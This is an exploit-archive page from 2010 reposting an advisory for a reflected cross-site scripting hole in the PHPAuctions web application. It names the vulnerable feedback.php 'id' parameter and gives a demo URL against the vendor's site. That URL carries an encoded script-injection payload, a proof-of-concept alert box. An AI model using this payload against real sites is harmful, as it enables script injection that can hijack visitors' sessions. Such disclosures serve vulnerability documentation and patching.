PHP Auctions XSS Vulnerabilities
Posted on 08 March 2010
================================ PHP AUCTIONS XSS Vulnerabilities ================================ Services Security Audit Schedule Prices of services Contact RSS SecurityReason IT News SecurityAlert World Laboratory of Bugtraq ExploitAlert Apache PHP Corporate Contact About SecurityReason Note If you have found a vulnerability, please send to our SecurityAlert Database : secalert@securityreason.com Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive : exploit@securityreason.com Home arrow ExploitAlert Database Arrow Topic : PHPAUCTIONS XSS Vulnerabilities Arrow ExploitAlert : 7906 Arrow Credit : SENOT Arrow Date : 08.03.2010 Arrow Download Arrow Plain text version Arrow Exploit Code : ########################################################################### ################################## ## Tittle : PHPAUCTIONS XSS Vulnerabilities ## ## Author : SENOT ## ## Homepage : http://www.indonesiancoder.com ## ## Date : Thursday 04 March, 2010 ## ## Location : - INDONESIA - ## ########################################################################### ################################## [+] INFO [+] Name : PHPAUCTIONS [+] Vendor : http://phpauctions.info/ [+] Vulnerability : XSS [+] Dork : “Dork Just for newbie” ########################################################################### ################################## [ Vulnerable File ] [+] http://127.0.0.1/[senot]/feedback.php?id=[INDONESIANCODER] [ DEMO ] [+] http://phpauctions.info/demo/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert% 28123456789%29%3C/script%3E&faction=show ##################################### # ~ - [ [ : Inj3ct0r : ] ]